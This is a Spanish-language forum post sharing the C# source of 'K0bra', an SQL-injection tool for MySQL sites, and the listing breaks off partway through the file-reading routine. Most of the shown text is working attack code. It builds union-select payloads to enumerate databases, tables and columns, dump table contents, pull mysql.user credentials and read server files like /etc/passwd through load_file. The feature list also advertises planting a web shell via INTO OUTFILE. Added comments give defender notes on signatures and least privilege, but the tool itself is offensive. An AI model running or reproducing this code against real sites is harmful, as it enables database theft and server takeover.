[C#] K0bra 1.0
Publicado: 15 Ago 2014, 16:57
Un simple scanner SQLI hecho en C#.
Con las siguientes funciones :
[+] Comprobar vulnerabilidad
[+] Buscar número de columnas
[+] Buscar automáticamente el número para mostrar datos
[+] Mostrar tablas
[+] Mostrar columnas
[+] Mostrar bases de datos
[+] Mostrar tablas de otra DB
[+] Mostrar columnas de una tabla de otra DB
[+] Mostrar usuarios de mysql.user
[+] Buscar archivos usando load_file
[+] Mostrar un archivo usando load_file
[+] Mostrar valores
[+] Mostrar información sobre la DB
[+] Crear una shell usando outfile
[+] Todo se guarda en logs ordenados
Unas imágenes:




Los códigos:
Form1.cs
SQLI_Scanner.cs
DH_Tools.cs
Si quieren lo puede bajar de [Enlace externo eliminado para invitados].
Con las siguientes funciones :
[+] Comprobar vulnerabilidad
[+] Buscar número de columnas
[+] Buscar automáticamente el número para mostrar datos
[+] Mostrar tablas
[+] Mostrar columnas
[+] Mostrar bases de datos
[+] Mostrar tablas de otra DB
[+] Mostrar columnas de una tabla de otra DB
[+] Mostrar usuarios de mysql.user
[+] Buscar archivos usando load_file
[+] Mostrar un archivo usando load_file
[+] Mostrar valores
[+] Mostrar información sobre la DB
[+] Crear una shell usando outfile
[+] Todo se guarda en logs ordenados
Unas imágenes:




Los códigos:
Form1.cs
// K0bra 1.0
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Text.RegularExpressions;
using System.IO;
namespace K0bra
{
// WinForms front end for the scanner. Every handler follows the same shape:
// create a DH_Tools helper and a SQLI_Scanner, point the scanner at the URL
// typed in textBox1 with the separator/comment style chosen in comboBox1,
// run one scanner routine, show the result in a control and append it to
// "logs/<host>.txt", where <host> is extracted from the typed URL by
// DH_Tools.urisplit (defined elsewhere, not shown in this listing).
//
// Review notes (documented, not changed here):
//  * the log path is built from the host portion of user-entered text with no
//    sanitising, and button8_Click passes the same string, unquoted, into a
//    shell "start" command through DH_Tools.console (not shown);
//  * the three listBoxN_DoubleClick handlers call .ToString() on SelectedItem,
//    which is null when nothing is selected (NullReferenceException);
//  * all network work runs synchronously on the UI thread, hence the repeated
//    this.Refresh() calls to get the status label repainted between steps;
//  * the controls (textBox1..8, listBox1..4, listView1..2, richTextBox1..2,
//    comboBox1, toolStripStatusLabel1) come from the designer file, not shown.
public partial class Form1 : Form
{
    public Form1()
    {
        InitializeComponent();
    }

    // "Check" button: boolean-based vulnerability test, then column count,
    // then textBox1 is overwritten with the generated injection URL (see
    // SQLI_Scanner.generate_sqli) so the other handlers can reuse it.
    private void button1_Click_1(object sender, EventArgs e)
    {
        toolStripStatusLabel1.Text = "[+] Checking ...";
        this.Refresh();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        string rta = kobra.checkvul();
        if (rta == "OK")
        {
            toolStripStatusLabel1.Text = "[+] Scanning ...";
            this.Refresh();
            rta = kobra.get_columns_length();
            if (rta == "OK")
            {
                // From here on textBox1 holds the URL with the "hackman" placeholder.
                textBox1.Text = kobra.generate_sqli();
                tools.savefile("logs/"+tools.urisplit(textBox1.Text,"host")+".txt","[+] SQLI : "+textBox1.Text);
                toolStripStatusLabel1.Text = "[+] Vulnerable !";
                this.Refresh();
            }
            else
            {
                toolStripStatusLabel1.Text = "[-] Columns length not found";
                this.Refresh();
            }
        }
        else
        {
            toolStripStatusLabel1.Text = "[-] Not vulnerable";
            this.Refresh();
        }
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // "Details" button: appends the get_details() report to richTextBox1.
    // rta is appended even when empty; the log entry is written only otherwise.
    private void button2_Click(object sender, EventArgs e)
    {
        toolStripStatusLabel1.Text = "[+] Getting Details ...";
        this.Refresh();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        string rta = kobra.get_details();
        if (rta == "")
        {
            MessageBox.Show("Not Found");
        }
        else
        {
            tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Details : " + rta);
        }
        richTextBox1.AppendText(rta);
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // Double-click on the database list: reload listBox1 with schema names and
    // clear the dependent table/column lists.
    private void listBox1_DoubleClick(object sender, EventArgs e)
    {
        toolStripStatusLabel1.Text = "[+] Getting DBS ...";
        this.Refresh();
        listBox1.Items.Clear();
        listBox2.Items.Clear();
        listBox3.Items.Clear();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        List<String> databases = kobra.get_databases();
        foreach (string database in databases)
        {
            listBox1.Items.Add(database);
            tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] DB : " + database);
        }
        if (listBox1.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // Double-click on the table list: tables of the schema selected in listBox1.
    // listBox1.SelectedItem is dereferenced without a null check.
    private void listBox2_DoubleClick(object sender, EventArgs e)
    {
        toolStripStatusLabel1.Text = "[+] Getting Tables ...";
        this.Refresh();
        listBox2.Items.Clear();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        List<String> tablas = kobra.get_tables_data(listBox1.SelectedItem.ToString());
        foreach (string tabla in tablas)
        {
            listBox2.Items.Add(tabla);
            tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Table : " + tabla);
        }
        if (listBox2.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // Double-click on the column list: columns of the schema/table selected in
    // listBox1/listBox2. Both SelectedItem values are dereferenced unchecked.
    private void listBox3_DoubleClick(object sender, EventArgs e)
    {
        toolStripStatusLabel1.Text = "[+] Getting Columns ...";
        this.Refresh();
        listBox3.Items.Clear();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        List<String> columnas = kobra.get_columns_data(listBox1.SelectedItem.ToString(),listBox2.SelectedItem.ToString());
        foreach (string columna in columnas)
        {
            listBox3.Items.Add(columna);
            tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Column : " + columna);
        }
        if (listBox3.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // "Dump" button: two columns (textBox3, textBox4) of table textBox2.
    // get_dump_values packs each row as "_0x3a_<col1>_0x3a_<col2>_0x3a_";
    // the regex below splits that back into the two ListView cells.
    private void button3_Click(object sender, EventArgs e)
    {
        listView1.Items.Clear();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        toolStripStatusLabel1.Text = "[+] Getting Values ...";
        this.Refresh();
        List<String> usuarios = kobra.get_dump_values(textBox2.Text, textBox3.Text, textBox4.Text);
        foreach (string usuario in usuarios)
        {
            Match regex = Regex.Match(usuario, "_0x3a_(.*?)_0x3a_(.*?)_0x3a_", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                ListViewItem item = new ListViewItem();
                item.Text = regex.Groups[1].Value;
                item.SubItems.Add(regex.Groups[2].Value);
                listView1.Items.Add(item);
                tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] " + textBox3.Text + " : " + regex.Groups[1].Value);
                tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] " + textBox4.Text + " : " + regex.Groups[2].Value);
            }
        }
        if (listView1.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // "Users" button: rows of mysql.user packed by get_mysql_users as
    // "_0x3a_<host>_0x3a_<user>_0x3a_<password>_0x3a_", shown in listView2 and
    // written to the log file in clear text.
    private void button4_Click(object sender, EventArgs e)
    {
        listView2.Items.Clear();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        toolStripStatusLabel1.Text = "[+] Getting users ... ";
        this.Refresh();
        List<String> usuarios = kobra.get_mysql_users();
        foreach (string usuario in usuarios)
        {
            Match regex = Regex.Match(usuario, "_0x3a_(.*?)_0x3a_(.*?)_0x3a_(.*?)_0x3a_", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                ListViewItem item = new ListViewItem();
                item.Text = regex.Groups[1].Value;
                item.SubItems.Add(regex.Groups[2].Value);
                item.SubItems.Add(regex.Groups[3].Value);
                tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Host : " + regex.Groups[1].Value);
                tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] User : " + regex.Groups[2].Value);
                tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Password : " + regex.Groups[3].Value);
                listView2.Items.Add(item);
            }
        }
        if (listView2.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // "Find files" button: paths from SQLI_Scanner.fuzz_files that load_file()
    // could read are listed in listBox4.
    private void button5_Click(object sender, EventArgs e)
    {
        listBox4.Items.Clear();
        SQLI_Scanner kobra = new SQLI_Scanner();
        DH_Tools tools = new DH_Tools();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        toolStripStatusLabel1.Text = "[+] Finding Files ... ";
        this.Refresh();
        List<String> archivos = kobra.fuzz_files();
        foreach (string archivo in archivos)
        {
            listBox4.Items.Add(archivo);
            tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] File Found : " + archivo);
        }
        if (listBox4.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // "Read file" button: content of the path in textBox5 via read_file(),
    // appended to richTextBox2 (even when empty) and logged when non-empty.
    private void button6_Click(object sender, EventArgs e)
    {
        richTextBox2.Clear();
        DH_Tools tools = new DH_Tools();
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        toolStripStatusLabel1.Text = "[+] Reading File ... ";
        this.Refresh();
        string rta = kobra.read_file(textBox5.Text);
        if (rta == "")
        {
            MessageBox.Show("Not Found");
        }
        else
        {
            tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] File : " + textBox5.Text);
            tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Content : " + rta);
        }
        richTextBox2.AppendText(rta + Environment.NewLine);
        toolStripStatusLabel1.Text = "[+] Finished";
        this.Refresh();
    }

    // "Shell" button: make_shell(filesystem dir = textBox6, web dir = textBox7);
    // textBox8 receives either the resulting URL or "Error". Unlike the other
    // handlers this one neither logs nor resets the status label afterwards.
    private void button7_Click(object sender, EventArgs e)
    {
        SQLI_Scanner kobra = new SQLI_Scanner();
        kobra.target = textBox1.Text;
        kobra.set_bypass(comboBox1.Text);
        toolStripStatusLabel1.Text = "[+] Creating Shell ... ";
        this.Refresh();
        string code = kobra.make_shell(textBox6.Text,textBox7.Text);
        textBox8.Text = code;
    }

    // Creates the "logs" directory relative to the process working directory.
    private void Form1_Load(object sender, EventArgs e)
    {
        if (!Directory.Exists("logs"))
        {
            System.IO.Directory.CreateDirectory("logs");
        }
    }

    // "Open log" button: hands "start logs/<host>.txt" to DH_Tools.console (not
    // shown). The host string is taken from user text and is not quoted.
    private void button8_Click(object sender, EventArgs e)
    {
        DH_Tools tools = new DH_Tools();
        tools.console("start " + "logs/" + tools.urisplit(textBox1.Text, "host") + ".txt");
    }
}
}
// The End ?
// SQLI Scanner Functions
// Version : Beta
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Text.RegularExpressions;
namespace K0bra
{
// Union-based MySQL SQL-injection routines driven by Form1. Conventions used
// throughout the class:
//  * `target` is the injectable URL. After get_columns_length() and
//    generate_sqli() it contains the literal placeholder "hackman" in the
//    column position that is reflected in the page; every later routine
//    substitutes its own expression for that placeholder with string.Replace.
//  * `bypass1` is the token used instead of spaces and `bypass2` the trailing
//    comment, both chosen by set_bypass().
//  * Reflected values are wrapped in fixed markers so they can be cut out of
//    the HTML with a regex: 0x4b30425241 is the hex encoding of the ASCII
//    string "K0BRA" (0x4B3042524131 / 0x4B3042524132 are "K0BRA1"/"K0BRA2"),
//    and char(69,82,84,79,82,56,53,52) spells "ERTOR854".
//  * All HTTP goes through toma(), which returns "" on any error, so a failed
//    request simply shows up as a regex that does not match.
//
// Defender notes: the marker strings above, the fixed User-Agent in toma() and
// the burst of load_file(0x...) requests from fuzz_files() are stable,
// tool-specific tokens suited to WAF/IDS signatures. The information_schema,
// mysql.user, load_file() and INTO OUTFILE routines only succeed when the web
// application's database account is over-privileged (FILE privilege, read
// access to mysql.user); least privilege on that account and MySQL's
// secure_file_priv setting neutralise most of them.
class SQLI_Scanner
{
    // Backing fields for the public properties below.
    string targetnow;
    string bypass1now;
    string bypass2now;
    int columnsnow;
    int number_datanow;

    // Injectable URL (later: URL containing the "hackman" placeholder).
    public string target
    {
        set { targetnow = value; }
        get { return targetnow; }
    }

    // Token inserted where SQL needs whitespace ("+", "/**/" or "%20").
    public string bypass1
    {
        set { bypass1now = value; }
        get { return bypass1now; }
    }

    // Trailing comment/terminator appended to each payload ("--", "/**/" or "%00").
    public string bypass2
    {
        set { bypass2now = value; }
        get { return bypass2now; }
    }

    // Number of columns found by get_columns_length().
    public int re_columns_length
    {
        set { columnsnow = value; }
        get { return columnsnow; }
    }

    // 1-based index of the column whose value is reflected in the page.
    public int re_number_data
    {
        set { number_datanow = value; }
        get { return number_datanow; }
    }

    public SQLI_Scanner()
    {
        target = "";
        bypass1 = "";
        bypass2 = "";
        re_columns_length = 0;
        re_number_data = 0;
    }

    // Maps the comboBox text to the separator/comment pair. Any other value
    // leaves both fields unchanged ("" from the constructor), which yields
    // payloads with no separators at all (e.g. "1and1=0").
    public void set_bypass(string opcion)
    {
        if (opcion == "--")
        {
            bypass1now = "+";
            bypass2now = "--";
        }
        if (opcion == "/*")
        {
            bypass1now = "/**/";
            bypass2now = "/**/";
        }
        if (opcion == "%20")
        {
            bypass1now = "%20";
            bypass2now = "%00";
        }
    }

    // Boolean-based check: fetches "<target>1 and 1=0" and "<target>1 and 1=1"
    // and returns "OK" when the two bodies differ, "Fuck" otherwise. Any
    // difference counts, so pages with dynamic content (timestamps, tokens)
    // are also reported as "OK"; two failed requests ("" == "") report "Fuck".
    public string checkvul()
    {
        string response = "";
        string code = "";
        string url1 = "";
        string url2 = "";
        url1 = toma(target + "1" + bypass1 + "and" + bypass1 + "1=0" + bypass2);
        url2 = toma(target + "1" + bypass1 + "and" + bypass1 + "1=1" + bypass2);
        if (url1 == url2)
        {
            response = "Fuck";
        }
        else
        {
            response = "OK";
        }
        return response;
    }

    // Determines the column count of the original query: appends one
    // concat(K0BRA,<n>,K0BRA) column per iteration (n = 2..25) to a
    // "-1 union select ..." payload and looks for the marker in the response.
    // The separators here are hard-coded "+" rather than bypass1/bypass2.
    // On the first hit re_columns_length = n, re_number_data = the reflected
    // column number, and numcontrol is zeroed to end the loop. Returns "OK" or
    // "Fuck". Convert.ToInt32 throws FormatException if the text between the
    // markers is not an integer.
    public string get_columns_length()
    {
        int numcontrol = 25;
        string sqli = "concat(0x4b30425241,1,0x4b30425241)";
        string controlsql = "";
        string respuesta = "";
        for (int num = 2; num <= numcontrol; num += 1)
        {
            sqli = sqli + "," + "concat(0x4b30425241," + num + ",0x4b30425241)";
            string code = toma(target + "-1+union+select+" + sqli);
            Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                re_columns_length = num;
                re_number_data = Convert.ToInt32(regex.Groups[1].Value);
                numcontrol = 0;
                controlsql = "OK";
            }
        }
        if (controlsql == "OK")
        {
            respuesta = "OK";
        }
        else
        {
            respuesta = "Fuck";
        }
        return respuesta;
    }

    // Builds the reusable injection URL
    // "<target>1 and 1=0 union select 1,2,...,N" with the reflected column
    // replaced by the placeholder "hackman". string.Replace rewrites every
    // occurrence of the digits, so e.g. re_number_data = 1 with ten or more
    // columns also rewrites the "1" inside "10", "11", ...
    public string generate_sqli()
    {
        string sqli = "1";
        string sqlifinal = "";
        for (int num = 2; num <= re_columns_length; num += 1)
        {
            sqli = sqli + "," + num;
        }
        sqli = sqli.Replace(Convert.ToString(re_number_data), "hackman");
        sqlifinal = target + "1" + bypass1 + "and" + bypass1 + "1=0" + bypass1 + "union" + bypass1 + "select" + bypass1 + sqli;
        return sqlifinal;
    }

    // Fingerprints the database through the placeholder: user(), database(),
    // version(); whether mysql.user and information_schema.tables are
    // selectable; and whether load_file() works
    // (0x2f6574632f706173737764 is "/etc/passwd"). Returns a multi-line
    // report; target is expected to already contain "hackman".
    public string get_details()
    {
        string url = target;
        string code = "";
        string respuesta = "";
        string url1 = url;
        string url2 = url;
        string url3 = url;
        url1 = url1.Replace("hackman", "concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)");
        url2 = url2.Replace("hackman", "0x4b30425241");
        url3 = url3.Replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))");
        respuesta = respuesta + "[+] Searching ..." + "\n\n";
        code = toma(url1);
        // Greedy (.*) groups: with several marker pairs on the page the split is ambiguous.
        Match regex = Regex.Match(code, "K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            respuesta = respuesta + "[+] User : " + regex.Groups[1].Value + "\n";
            respuesta = respuesta + "[+] Database : " + regex.Groups[2].Value + "\n";
            respuesta = respuesta + "[+] Version : " + regex.Groups[3].Value + "\n";
        }
        code = toma(url2 + bypass1 + "from" + bypass1 + "mysql.user" + bypass2);
        regex = Regex.Match(code, "K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            respuesta = respuesta + "[+] mysql_user() : ON" + "\n";
        }
        else
        {
            respuesta = respuesta + "[+] mysql_user() : OFF" + "\n";
        }
        code = toma(url2 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass2);
        regex = Regex.Match(code, "K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            respuesta = respuesta + "[+] information_schema.tables : ON" + "\n";
        }
        else
        {
            respuesta = respuesta + "[+] information_schema.tables : OFF" + "\n";
        }
        code = toma(url3);
        regex = Regex.Match(code, "K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            respuesta = respuesta + "[+] load_file() : ON" + "\n";
        }
        else
        {
            respuesta = respuesta + "[+] load_file() : OFF" + "\n";
        }
        respuesta = respuesta + "\n" + "[+] Finished";
        return respuesta;
    }

    // Table names from information_schema.tables across all schemas, one
    // request per row (LIMIT n,1). The loop starts at 17, presumably to skip
    // the server's own information_schema rows -- the rationale is not in the
    // code. Convert.ToInt16(cantidad) throws FormatException when the count
    // marker was not matched and cantidad is still "". Not referenced by Form1
    // in this listing (Form1 uses get_tables_data).
    public List<String> get_tables()
    {
        string url = target;
        string web1 = url;
        string web2 = url;
        string cantidad = "";
        string code = "";
        List<string> tablas = new List<string>();
        web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
        web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
        code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass2);
        Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            cantidad = regex.Groups[1].Value;
        }
        for (int num = 17; num <= Convert.ToInt16(cantidad); num++)
        {
            code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
            regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                tablas.Add(regex.Groups[1].Value);
            }
        }
        return tablas;
    }

    // Column names of table `tabla` (hex-encoded via hexencode so no quotes are
    // needed) from information_schema.columns, one request per row. Loop runs
    // 0..count inclusive, i.e. one request more than there are rows. Same
    // Convert.ToInt16("") caveat as get_tables. Not referenced by Form1 in
    // this listing (Form1 uses get_columns_data).
    public List<String> get_columns(string tabla)
    {
        string url = target;
        string web1 = url;
        string web2 = url;
        string cantidad = "";
        string tablaz = hexencode(tabla);
        string code = "";
        List<string> columnas = new List<string>();
        web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
        web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
        code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tablaz + bypass2);
        Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            cantidad = regex.Groups[1].Value;
        }
        for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
        {
            code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tablaz + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
            regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                columnas.Add(regex.Groups[1].Value);
            }
        }
        return columnas;
    }

    // Schema names from information_schema.schemata, one request per row
    // (0..count inclusive). Same Convert.ToInt16("") caveat as get_tables.
    public List<String> get_databases()
    {
        string url = target;
        string web1 = url;
        string web2 = url;
        string cantidad = "";
        string code = "";
        List<string> databases = new List<string>();
        web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");
        code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.schemata" + bypass2);
        Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            cantidad = regex.Groups[1].Value;
        }
        for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
        {
            code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.schemata" + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
            regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                databases.Add(regex.Groups[1].Value);
            }
        }
        return databases;
    }

    // Table names of schema `dat` (hex-encoded) from information_schema.tables,
    // one request per row (0..count inclusive). Same Convert.ToInt16("") caveat.
    public List<String> get_tables_data(string dat)
    {
        string url = target;
        string web1 = url;
        string web2 = url;
        string cantidad = "";
        string data = hexencode(dat);
        string code = "";
        List<string> tablas = new List<string>();
        web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
        code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass1 + "where" + bypass1 + "table_schema=" + data + bypass2);
        Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            cantidad = regex.Groups[1].Value;
        }
        for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
        {
            code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass1 + "where" + bypass1 + "table_schema=" + data + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
            regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                tablas.Add(regex.Groups[1].Value);
            }
        }
        return tablas;
    }

    // Column names of table `tab` in schema `dat` (both hex-encoded) from
    // information_schema.columns, one request per row (0..count inclusive).
    // Same Convert.ToInt16("") caveat as get_tables.
    public List<String> get_columns_data(string dat,string tab)
    {
        string url = target;
        string web1 = url;
        string web2 = url;
        string cantidad = "";
        string data = hexencode(dat);
        string tabx = hexencode(tab);
        string code = "";
        List<string> columnas = new List<string>();
        web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
        code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tabx + bypass1 + "and" + bypass1 + "table_schema=" + data + bypass2);
        Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            cantidad = regex.Groups[1].Value;
        }
        for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
        {
            code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tabx + bypass1 + "and" + bypass1 + "table_schema=" + data + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
            regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                columnas.Add(regex.Groups[1].Value);
            }
        }
        return columnas;
    }

    // Host, User and Password columns of mysql.user, one request per row, each
    // field wrapped in its own marker pair (K0BRA / K0BRA1 / K0BRA2) and
    // returned packed as "_0x3a_<host>_0x3a_<user>_0x3a_<password>_0x3a_" for
    // Form1 to split. Only works when the application's DB account can read
    // mysql.user -- a clear over-privilege indicator; the Password column was
    // also removed in MySQL 5.7, so this fails on current servers. Same
    // Convert.ToInt16("") caveat as get_tables.
    public List<String> get_mysql_users()
    {
        string url = target;
        string web1 = url;
        string web2 = url;
        string cantidad = "";
        string code = "";
        List<string> usuarios = new List<string>();
        web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");
        code = toma(web1 + bypass1 + "from" + bypass1 + "mysql.user" + bypass2);
        Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            cantidad = regex.Groups[1].Value;
        }
        for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
        {
            code = toma(web2 + bypass1 + "from" + bypass1 + "mysql.user" + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
            regex = Regex.Match(code, "K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                usuarios.Add("_0x3a_" + regex.Groups[1].Value + "_0x3a_" + regex.Groups[2].Value + "_0x3a_" + regex.Groups[3].Value + "_0x3a_");
            }
        }
        return usuarios;
    }

    // Two columns (col1now, col2now) of table tablanow, one request per row
    // (0..count inclusive). The table and column names come straight from the
    // UI text boxes and are spliced into the query as typed. Rows are packed
    // as "_0x3a_<col1>_0x3a_<col2>_0x3a_" for Form1. Same Convert.ToInt16("")
    // caveat as get_tables.
    public List<String> get_dump_values(string tablanow,string col1now,string col2now)
    {
        string url = target;
        string web1 = url;
        string web2 = url;
        string cantidad = "";
        string code = "";
        string col1 = col1now;
        string col2 = col2now;
        string table = tablanow;
        List<string> valores = new List<string>();
        web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
        web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");
        code = toma(web1 + bypass1 + "from" + bypass1 + table + bypass2);
        Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
        if (regex.Success)
        {
            cantidad = regex.Groups[1].Value;
        }
        for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
        {
            code = toma(web2 + bypass1 + "from" + bypass1 + table + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
            regex = Regex.Match(code, "K0BRA(.*)K0BRA(.*)K0BRA", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                valores.Add("_0x3a_" + regex.Groups[1].Value + "_0x3a_" + regex.Groups[2].Value + "_0x3a_");
            }
        }
        return valores;
    }

    // Reads file `fil` (hex-encoded path) with load_file(), wrapped in
    // "ERTOR854" markers. Singleline lets the match span multi-line content.
    // Returns "" when the markers are absent (no FILE privilege, path outside
    // secure_file_priv, unreadable file, or failed request).
    public string read_file(string fil)
    {
        string url = target;
        string web1 = url;
        string file = hexencode(fil);
        string code = "";
        string response = "";
        web1 = web1.Replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + file + "),char(69,82,84,79,82,56,53,52))))");
        code = toma(web1);
        Match regex = Regex.Match(code, "ERTOR854(.*?)ERTOR854", RegexOptions.IgnoreCase | RegexOptions.Singleline);
        if (regex.Success)
        {
